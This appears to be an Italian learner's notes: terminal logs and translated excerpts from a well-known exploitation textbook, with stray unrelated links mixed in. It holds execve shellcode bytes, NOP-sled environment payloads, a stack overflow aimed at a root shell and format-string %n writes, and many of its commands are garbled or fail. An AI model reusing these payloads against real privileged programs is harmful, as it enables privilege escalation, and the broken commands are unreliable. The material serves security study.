GNOME_TERMINAL_SCREEN=/org/gnome/Terminal/screen/64315df4_cd30_40e1_8270_3ed25290b952
MOZ_GMP_PATH=/usr/lib64/mozilla/plugins/gmp-gmpopenh264/system-installed
GNOME_SETUP_DISPLAY=:1
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=||/usr/bin/lesspipe.sh %s
USER=lele
GNOME_TERMINAL_SERVICE=:1.696
DISPLAY=:0
SHLVL=1
QT_IM_MODULE=ibus
XDG_RUNTIME_DIR=/run/user/1000
DEBUGINFOD_URLS=https://debuginfod.fedoraproject.org/
DEBUGINFOD_IMA_CERT_PATH=/etc/keys/ima:
XDG_DATA_DIRS=/home/lele/.local/share/flatpak/exports/share:/var/lib/flatpak/exports/share:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop
PATH=/home/lele/.local/bin:/home/lele/bin:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/var/lib/snapd/snap/bin
GDMSESSION=gnome
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
MAIL=/var/spool/mail/lele
SYSTEMD_SLEEP_FREEZE_USER_SESSIONS=0
_=/usr/bin/env
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c
#include
#include
#include
char shellcode[]=
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”
“\xe1\xcd\x80”;
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\””
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”
“\xe1\xcd\x80”;
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”
“\xe1\xcd\x80”;
bash: \x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68: comando non trovato…
bash: \x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89: comando non trovato…
bash: \xe1\xcd\x80: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\””
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”
“\xe1\xcd\x80”;
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\”” | cut
cut: è necessario specificare una elenco di byte, caratteri o campi
Try ‘cut –help’ for more information.
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\”” | cut
-d\” -f2
cut: è necessario specificare una elenco di byte, caratteri o campi
Try ‘cut –help’ for more information.
bash: -d”: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\”” | cut
-d\” -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
cut: è necessario specificare una elenco di byte, caratteri o campi
Try ‘cut –help’ for more information.
bash: -d”: comando non trovato…
bash: x31xc0x31xdbx31xc9x99xb0xa4xcdx80x6ax0bx58x51x68: comando non trovato…
bash: x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x89xe2x53x89: comando non trovato…
bash: xe1xcdx80: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ for i in $(head exploit_notesearch.c | grep
“^\”” | cut -d\” -f2)
> do
> echo -en $i
> done > shellcode.bin
Uso: grep [OPZIONE]… MODELLI [FILE]…
Usare “grep –help” per ulteriori informazioni.
bash: ^”: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ done > shellcode.bin
bash: errore di sintassi vicino al token non atteso “done”
lele@fedora:~/Scaricati/booksrc$ hexdump -C shellcode.bin
lele@fedora:~/Scaricati/booksrc$ for i in $(head exploit_notesearch.c | grep
“^\”” | cut -d\” -f2)
> do
> echo -en $i
> done > shellcode.bin
Uso: grep [OPZIONE]… MODELLI [FILE]…
Usare “grep –help” per ulteriori informazioni.
bash: ^”: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ hexdump -C shellcode.bin
lele@fedora:~/Scaricati/booksrc$ export SHELLCODE=$(perl -e ‘print “\
x90″x200’)$(cat shellcode.bin)
lele@fedora:~/Scaricati/booksrc$ echo $SHELLCODE
x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90
lele@fedora:~/Scaricati/booksrc$
pag. 204
******************************************************************************************
pag. 204
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
0x331 Uso dell’ambiente
A volte un buffer è troppo piccolo per contenere lo shellcode.
Fortunatamente, ci sono altri luoghi in memoria dove infilare questo
codice. Le variabili d’ambiente vengono utilizzate dalla shell per
moltissimi scopi; ciò a cui servono non è così importante come il fatto
che si trovano nello stack e possono essere impostate dalla shell.
L’esempio che segue imposta una variabile d’ambiente di nome MYVAR
al valore stringa test. Questa variabile può essere consultata anteponendo
al nome il simbolo del dollaro. In aggiunta, il comando env visualizza
tutte le variabili d’ambiente definite in un dato istante. Notate come siano
già presenti molte variabili d’ambiente di default.
Help: Academy: Linux Buffer Overflows – Stuck at Determine the Length for Shellcode
byu/SurfRedLin inhackthebox
https://www.davidemarrone.it/files/tesi_triennale.pdf
fatto con slide
https://users.dimi.uniud.it/~ivan.scagnetto/SO/h-sedici.pdf
lele@fedora:~$ cd ‘/home/lele/Scaricati/booksrc’
lele@fedora:~/Scaricati/booksrc$ export MYVAR=test
lele@fedora:~/Scaricati/booksrc$ echo $MYVAR
test
lele@fedora:~/Scaricati/booksrc$ env
SHELL=/bin/bash
SESSION_MANAGER=local/unix:@/tmp/.ICE-unix/3567,unix/unix:/tmp/.ICE-unix/3567
COLORTERM=truecolor
HISTCONTROL=ignoredups
XDG_MENU_PREFIX=gnome-
HISTSIZE=1000
HOSTNAME=fedora
MYVAR=test
SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
MEMORY_PRESSURE_WRITE=c29tZSAyMDAwMDAgMjAwMDAwMAA=
XMODIFIERS=@im=ibus
DESKTOP_SESSION=gnome
GPG_TTY=/dev/pts/0
EDITOR=/usr/bin/nano
PWD=/home/lele/Scaricati/booksrc
LOGNAME=lele
XDG_SESSION_DESKTOP=gnome
XDG_SESSION_TYPE=wayland
SYSTEMD_EXEC_PID=3622
XAUTHORITY=/run/user/1000/.mutter-Xwaylandauth.O5NTY2
GDM_LANG=it_IT.UTF-8
HOME=/home/lele
USERNAME=lele
LANG=it_IT.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.7z=01;31:*.ace=01;31:*.alz=01;31:*.apk=01;31:*.arc=01;31:*.arj=01;31:*.bz=01;31:*.bz2=01;31:*.cab=01;31:*.cpio=01;31:*.crate=01;31:*.deb=01;31:*.drpm=01;31:*.dwm=01;31:*.dz=01;31:*.ear=01;31:*.egg=01;31:*.esd=01;31:*.gz=01;31:*.jar=01;31:*.lha=01;31:*.lrz=01;31:*.lz=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.lzo=01;31:*.pyz=01;31:*.rar=01;31:*.rpm=01;31:*.rz=01;31:*.sar=01;31:*.swm=01;31:*.t7z=01;31:*.tar=01;31:*.taz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tgz=01;31:*.tlz=01;31:*.txz=01;31:*.tz=01;31:*.tzo=01;31:*.tzst=01;31:*.udeb=01;31:*.war=01;31:*.whl=01;31:*.wim=01;31:*.xz=01;31:*.z=01;31:*.zip=01;31:*.zoo=01;31:*.zst=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:*~=00;90:*#=00;90:*.bak=00;90:*.crdownload=00;90:*.dpkg-dist=00;90:*.dpkg-new=00;90:*.dpkg-old=00;90:*.dpkg-tmp=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:*.swp=00;90:*.tmp=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:
XDG_CURRENT_DESKTOP=GNOME
MEMORY_PRESSURE_WATCH=/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/session.slice/org.gnome.Shell@wayland.service/memory.pressure
VTE_VERSION=7800
WAYLAND_DISPLAY=wayland-0
GNOME_TERMINAL_SCREEN=/org/gnome/Terminal/screen/82201477_962b_4edf_8017_2c75d9cf9912
MOZ_GMP_PATH=/usr/lib64/mozilla/plugins/gmp-gmpopenh264/system-installed
GNOME_SETUP_DISPLAY=:1
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=||/usr/bin/lesspipe.sh %s
USER=lele
GNOME_TERMINAL_SERVICE=:1.144
DISPLAY=:0
SHLVL=1
QT_IM_MODULE=ibus
XDG_RUNTIME_DIR=/run/user/1000
DEBUGINFOD_URLS=https://debuginfod.fedoraproject.org/
DEBUGINFOD_IMA_CERT_PATH=/etc/keys/ima:
XDG_DATA_DIRS=/home/lele/.local/share/flatpak/exports/share:/var/lib/flatpak/exports/share:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop
PATH=/home/lele/.local/bin:/home/lele/bin:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/var/lib/snapd/snap/bin
GDMSESSION=gnome
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
MAIL=/var/spool/mail/lele
SYSTEMD_SLEEP_FREEZE_USER_SESSIONS=0
OLDPWD=/home/lele
_=/usr/bin/env
lele@fedora:~/Scaricati/booksrc$
pag 203
Quindi lo shellcode può essere ospitato in una variabile d’ambiente,
ma prima dev’essere convertito in un formato facile da manipolare.
Possiamo utilizzare lo shellcode dell’exploit notesearch; basta solo
tradurlo in formato binario. Possiamo usare i classici strumenti da riga di
comando, come head, grep e cut, per isolare solo i caratteri esadecimali
dello shellcode.
https://it.wikipedia.org/wiki/Shellcode
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\””
“\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68”
“\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89”
“\xe1\xcd\x80”;
lele@fedora:~/Scaricati/booksrc$ head exploit_notesearch.c | grep “^\”” | cut
-d\” -f2
cut: è necessario specificare una elenco di byte, caratteri o campi
Try ‘cut –help’ for more information.
Le prime 10 righe del programma vengono inviate tramite una pipe a
grep, che visualizza solo quelle che iniziano con un punto interrogativo.
In questo modo isoliamo le righe che contengono lo shellcode. Queste
vengono inviate a cut con l’opzione di visualizzare solo i byte tra doppi
apici.
pag. 204
Il ciclo for della shell BASH è perfetto per inviare ciascuna di queste
righe a un comando echo, con l’opzione di riconoscere l’espansione
esadecimale e omettere il carattere newline a ogni riga.
*
Corso facilitato di bash scripting
By CasertaGLUG per informazioni contattare l’autore casertaglug-owner@autistici.org
https://www.claudiove.com/wp/wp-content/folder_bash/000_SCRIPTING_BASH_03.pdf
lele@fedora:~/Scaricati/booksrc$ for i in $(head exploit_notesearch.c | grep
“^\”” | cut -d\” -f2)
> do
> echo -en$i
> done > shellcode.bin
Uso: grep [OPZIONE]… MODELLI [FILE]…
Usare “grep –help” per ulteriori informazioni.
bash: ^”: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ for i in $(head exploit_notesearch.c | grep
“^\”” | cut -d\” -f2)
> do
> echo -en $si
> done > shellcode.bin
Uso: grep [OPZIONE]… MODELLI [FILE]…
Usare “grep –help” per ulteriori informazioni.
bash: ^”: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ hexdump -C shellcode.bin
Perché offuscare il proprio shellcode?
Il motivo alla base di questa attività è quello di mascherare il codice che vogliamo inserire all’interno di un exploit, per andare ad far eseguire del codice arbitrario al nostro processo vittima.
Lo voglio mascherare per un semplice motivo, rendere la vita difficile a chi analizza il codice dell’exploit o semplicemente per cercare di ingannare il nostro anti-virus.
https://codiceinsicuro.it/blog/come-offuscare-un-semplice-shellcode-parte-1/
pag. 205
A questo punto abbiamo lo shellcode in un file di nome shellcode.bin.
Possiamo usare la sostituzione di comandi per inserire lo shellcode in una
variabile d’ambiente, assieme a un generoso NOP sled.
lele@fedora:~/Scaricati/booksrc$ export SHELLCODE=$(perl -e ‘print “\
x90″x200’)$(cat shellcode.bin)
lele@fedora:~/Scaricati/booksrc$ echo $SHELLCODE
x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90
lele@fedora:~/Scaricati/booksrc$
*
https://davidefalco.github.io/appunti-informatica/sicurezza/03-network-security-e-software-security/come-scrivere-shellcode.html
….
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
lele@fedora:~/Scaricati/booksrc$ gdb -q ./notesearch
./notesearch: File o directory non esistente.
(gdb) break main
No symbol table is loaded. Use the “file” command.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (main) pending.
(gdb) run
Starting program:
No executable file specified.
Use the “file” or “exec-file” command.
(gdb) i r esp
The program has no registers now.
(gdb) x/24s $esp + 0x240
No registers.
(gdb) ./notesearch $(perl -e ‘print “\x47\xf9\xff\
xbf”x40’)
Undefined command: “.”. Try “help”.
(gdb) whoami
Undefined command: “whoami”. Try “help”.
(gdb) quit
lele@fedora:~/Scaricati/booksrc$ ./notesearch $(perl -e ‘print “\x47\xf9\xff\
xbf”x40’)
bash: ./notesearch: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ whoami
lele
pag 206
Nella libreria standard del C esiste una funzione, di nome
getenv(), che accetta come parametro il nome di una variabile
d’ambiente e ne restituisce l’indirizzo a cui si trova in memoria. Il codice
del programma getenv_example.c illustra l’utilizzo di getenv().g
pag. 207
Una volta compilato e avviato, questo programma mostra l’indirizzo in
memoria di una data variabile d’ambiente. In questo modo è possibile
predire in modo assai più accurato dove si troverà la stessa variabile una
volta avviato il programma target.
lele@fedora:~/Scaricati/booksrc$ gcc getenv_example.c
lele@fedora:~/Scaricati/booksrc$ ./a.out SHELLCODE
SHELLCODE is at 0x7ffc7981bf04
lele@fedora:~/Scaricati/booksrc$ ./notesearch $(perl -e ‘print “\x0b\xf9\xff\
xbf”x40’)
bash: ./notesearch: File o directory non esistente
La precisione di questo procedimento è sufficiente se si usa un NOP
sled. Se si prova senza NOP sled, il programma va in crash. Questo
significa che la previsione della variabile d’ambiente non è ancora
completa.
lele@fedora:~/Scaricati/booksrc$ export SLEDLESS=$(cat shellcode.bin)
lele@fedora:~/Scaricati/booksrc$ ./a.out SLEDLESS
SLEDLESS is at 0x7fffd8824da6
lele@fedora:~/Scaricati/booksrc$ ./notesearch $(perl -e ‘print “\x46\xff\xff\
xbf”x40’)
bash: ./notesearch: File o directory non esistente
http://www.diag.uniroma1.it/~liberato/struct/mempunt/index.shtml
La precisione di questo procedimento è sufficiente se si usa un NOP
sled. Se si prova senza NOP sled, il programma va in crash. Questo
significa che la previsione della variabile d’ambiente non è ancora
completa.
Buffer overflow NOP size question
byu/small-data-expert inoscp
pag. 209
Per predire un indirizzo di memoria esatto bisogna tener conto delle
differenze all’apparenza più insignificanti. Per esempio, la lunghezza del
nome del programma in esecuzione sembra influenzare l’indirizzo delle
variabili d’ambiente. Questo effetto può essere analizzato cambiando il
nome del programma e sperimentando. Questo tipo di sperimentazione e
riconoscimento di modelli è una dote molto importante per un hacker.
lele@fedora:~/Scaricati/booksrc$ cp a.out a
lele@fedora:~/Scaricati/booksrc$ ./a SLEDLESS
SLEDLESS is at 0x7ffd0fa60dae
lele@fedora:~/Scaricati/booksrc$ cp a.out bbhttps://www.egeaeditore.it/ita/prodotti/cultura-scientifica/comunicazione-artificiale.aspx
“alle implicazioni del «diritto all’oblio»; per approdare infine alle fotografie,
utilizzate oggi più per sfuggire al presente che per conservare una memoria per il futuro.”
quaderni di sociologia
https://journals.openedition.org/qds/5154
Bergamo città impresa
COME GLI ALGORITMI PRODUCONO INTELLIGENZA SOCIALE
ItalyPost
https://www.unibo.it/sitoweb/elena.esposito9/cv
https://www.classagora.it/speakers/elena-esposito-2362
https://www.ilbollettino.eu/2024/04/15/esposito-unibo-ai-luomo-resta-al-centro-ma-e-necessario-un-reskilling/
sullo statuto di finzione della realtà contemporanea e sul ruolo
delle aspettative e della temporalità nell’economia finanziaria.
Negli ultimi tempi si sta occupando anche della questione degli
algoritmi predittivi. È in corso di stampa per MIT Press il suo ultimo
volume: Artificial Communication: How Algorithms Produce Social Intelligence.
lele@fedora:~/Scaricati/booksrc$ ./bb SLEDLESS
SLEDLESS is at 0x7fff0ce6edac
lele@fedora:~/Scaricati/booksrc$ cp a.out ccc
lele@fedora:~/Scaricati/booksrc$ ./ccc SLEDLESS
SLEDLESS is at 0x7ffee534adaa
lele@fedora:~/Scaricati/booksrc$ ./a.out SLEDLESS
SLEDLESS is at 0x7ffd9654fda6
lele@fedora:~/Scaricati/booksrc$ gdb -q
(gdb) p 0x7ffd0fa60dae – 0x7ffd9654fda6
$1 = -2259611640
(gdb) quit
Come mostra l’esperimento precedente, la lunghezza del nome del
programma in esecuzione influenza la posizione delle variabili
d’ambiente esportate. Il modello generale sembra essere una diminuzione
di due byte nell’indirizzo della variabile d’ambiente per ciascun byte di
incremento della lunghezza del nome del programma. Questo è vero
anche con a. out, dato che la differenza di lunghezza tra a. out e a è di
quattro byte, e la differenza tra l’indirizzo 0xbfffff4e e 0xbfffff46 è di
otto byte. Ciò implica che il nome del programma in esecuzione viene
inserito anch’esso da qualche parte dello stack.
Con questa nuova informazione, possiamo predire l’indirizzo esatto di
una variabile d’ambiente quando viene eseguito un programma
vulnerabile. Possiamo addirittura eliminare il NOP sled.
*************************************************************************************************
art of hacking “il gioco” … della vita 2 : ))))
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
lele@fedora:~/Scaricati/booksrc$ perl -e ‘print “1\n5\nn\n5\n” . “A”x100 .
“\x70\
x8d\x04\x08\n” . “1\ nn\n” . “7\n”‘ | ./game_of_chance
bash: ./game_of_chance: File o directory non esistente
pag. 232
Dopo aver avuto conferma che il metodo funziona, usiamolo per
guadagnare un numero di crediti qualsiasi.
perl -e ‘print “1\n5\nn\n5\n” . “A”x100 . “\
x70\x8d\x04\x08\n” . “1\ n” . “y\n”x10 . “n\n5\nJon Erickson\n7\n”‘ | ./
game_of_chance
bash: ./: È una directory
bash: game_of_chance: comando non trovato…
lele@fedora:~/Scaricati/booksrc$ perl -e ‘print “1\n5\nn\n5\n” . “A”x100 . “\
x70\x8d\x04\x08\n” . “1\ n” . “y\n”x10 . “n\n5\nJon Erickson\n7\n”‘ | ./
game_of_chance
bash: ./: È una directory
bash: game_of_chance: comando non trovato…
pag. 235
Come avrete notato, anche questo programma è suid root. Questo
significa che lo shellcode può essere utilizzato per fare molto più che
ottenere crediti. Come accadeva con gli overflow dello stack, lo
shellcode può essere memorizzato in una variabile d’ambiente. Dopo
aver costruito un buffer ad hoc, lo inviamo via pipe allo standard input di
game_of_chance. Notate l’argomento ‘-’ che segue il buffer nel comando
cat. Esso indica al programma di inviare lo standard input dopo il buffer,
ritornandogli il controllo dell’input. Anche se la shell di root non
visualizza alcun prompt, è comunque accessibile e con i massimi
privilegi.
Create a shellcode that executes a shell as root
byu/t3chn007 inLiveOverflow
lele@fedora:~/Scaricati/booksrc$ export SHELLCODE=$(cat ./shellcode.bin)
lele@fedora:~/Scaricati/booksrc$ ./getenvaddr SHELLCODE ./game_of_chance
SHELLCODE will be at 0x7ffd2ab9122f
lele@fedora:~/Scaricati/booksrc$ perl -e ‘print “1\n7\nn\n5\n” . “A”x100 .
“\xe0\
xf9\xff\xbf\n” . “1\n”‘ > exploit_buffer
lele@fedora:~/Scaricati/booksrc$ cat exploit_buffer – | ./game_of_chance
bash: ./game_of_chance: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$
pag.237
0x350 Stringhe di formato
Gli exploit sulle stringhe di formato sono un’altra tecnica per ottenere
il controllo di un programma privilegiato. Come gli exploit da buffer
overflow, anche gli exploit da stringa di formato dipendono da errori di
programmazione che sembrano non avere impatti ovvi sulla sicurezza.
pag. 238
0x351 Formato dei parametri
A questo punto dovreste avere parecchia dimestichezza con le stringhe
di formato, che abbiamo impiegato pesantemente nei programmi
precedenti all’interno di funzioni come printf(). Una funzione che usa
le stringhe di formato, come printf(), valuta la stringa di formato che
viene passata come argomento ed effettua azioni speciali ogni volta che
raggiunge un parametro. Ciascun parametro richiede che venga passata
un’ulteriore variabile: se ci sono tre parametri in una stringa di formato,
dovranno esserci anche tre argomenti per la funzione (oltre alla stringa di
formato stessa).
Riepiloghiamo i vari parametri di formato visti nel capitolo
precedente.
https://www.ibm.com/docs/it/i/7.5?topic=functions-strdup-duplicate-string
Esercizi d”esame svolti di progammazione in C
http://www.diag.uniroma1.it/~santucci/CE_II/dispensaC.pdf
% p serve a inserire il valore
https://it.quora.com/Cosa-vuol-dire-p-nella-funzione-printf-in-C
pag. 238
Riepiloghiamo i vari parametri di formato visti nel capitolo
precedente.
Parametro Tipo di input Tipo di output
%d Valore Decimale
%u Valore Decimale senza segno
%x Valore Esadecimale
%s Puntatore Stringa
%n Puntatore Numero di byte scritti finora
Nel capitolo precedente abbiamo visto l’uso dei parametri di formato
più comuni, ma abbiamo tralasciato il più raro parametro %n. Il listato
fmt_uncommon.c colma questa lacuna.
https://www.ibm.com/docs/it/aix/7.3?topic=s-strcat-strncat-strxfrm-strxfrm-l-strcpy-strncpy-stpcpy-stpncpy-strdup-strndup-subroutines
Questo programma usa due parametri %n nell’istruzione printf().
Ecco l’output della compilazione e dell’esecuzione del programma.
reader@hacking:~/booksrc $ gcc fmt_uncommon.c
lele@fedora:~/Scaricati/booksrc$ gcc fmt_uncommon.c
lele@fedora:~/Scaricati/booksrc$ ./a.out
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at 24455958. B is 7.
lele@fedora:~/Scaricati/booksrc$
………………………………………………………………………………………………
*******************************************************************************************
Inoltre il codice sorgente riportato nel libro è scaricabile gratuitamente
all’indirizzo booksrc , link interno:
https://nostarch.com/hackingCD
https://www.kea.nu/files/textbooks/humblesec/hacking_artofexploitation_2ndedition.pdf
pag. 251
Come risulta dall’output precedente, la modifica al codice ha prodotto
anche lo spostamento di indirizzo della variabile test_val. In ogni caso, la
variabile next_val risulta essere adiacente a essa. Per esercizio, scriviamo
ancora un indirizzo nella variabile test_val usando il nuovo indirizzo.
L’ultima volta abbiamo usato un indirizzo costruito appositamente per
semplicità (0xddccbbaa); dato che ogni byte è maggiore di quello
precedente, è facile incrementare il contatore di byte. Ma che cossa
succede se si usa un indirizzo come 0x0806abcd? Con questo indirizzo è
facile scrivere il primo byte (0xCD) utilizzando il parametro di formato
%n e stampando 205 byte totali con una larghezza di campo di 161. Ma
ora il prossimo byte da scrivere è 0xAB, che richiede 171 byte in output.
È facile incrementare il contatore dei byte, ma è impossibile sottrarre
da esso
https://www.ibm.com/docs/it/developer-for-zos/16.0?topic=mode-displaying-modifying-value-assembler-variables-storage
Is it undefined behavior to modify temporary objects in an expression after they've been constructed without using move semantics? (e.g. for passing "write-on-destruction" temp containers to output parameters)
byu/ParsingError incpp_questions
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln2 AAAA%x%x%x%x
bash: ./fmt_vuln2: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0xcd – 5”
$1 = 200
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln $(printf “\xf4\x97\x04\x08JUNK\xf5\
x97\x04\x08JUNK\xf6\x97\x04\ x08JUNK\xf7\x97\x04\x08”)%x%x%8x%n
The right way to print user-controlled input:
�JUNK�x9JUNK��\
The wrong way to print user-controlled input:
�JUNK�x9JUNK��\
[*] test_val @ 0x0040402c = -72 0xffffffb8
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln2 $(printf “\xf4\x97\x04\x08JUNK\xf5\
x97\x04\x08JUNK\xf6\x97\x04\ x08JUNK\xf7\x97\x04\x08”)%x%x%8x%n
bash: ./fmt_vuln2: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0xcd – 52 + 8”
$1 = 161
lele@fedora:~/Scaricati/booksrc$ ./fmt_vuln2 $(printf “\xf4\x97\x04\x08JUNK\xf5\
x97\x04\x08JUNK\xf6\x97\x04\ x08JUNK\xf7\x97\x04\x08”)%x%x%161x%n
bash: ./fmt_vuln2: File o directory non esistente
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0xab – 0xcd”
$1 = -34
lele@fedora:~/Scaricati/booksrc$
pag. 252
Invece di provare a sottrarre 34 da 205, portiamo il byte meno
significativo a 0x1AB aggiungendo 222 a 205 per produrre 427,
rappresentazione decimale di 0x1AB. Questa tecnica può essere utilizzata
nuovamente per portare il byte meno significativo a 0x06 nella terza
scrittura.
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p 0x1ab – 0xcd”
$1 = 222
lele@fedora:~/Scaricati/booksrc$ gdb -q –batch -ex “p /d 0x1ab”
$1 = 427
$1 = 427
bash: =: comando non trovato…
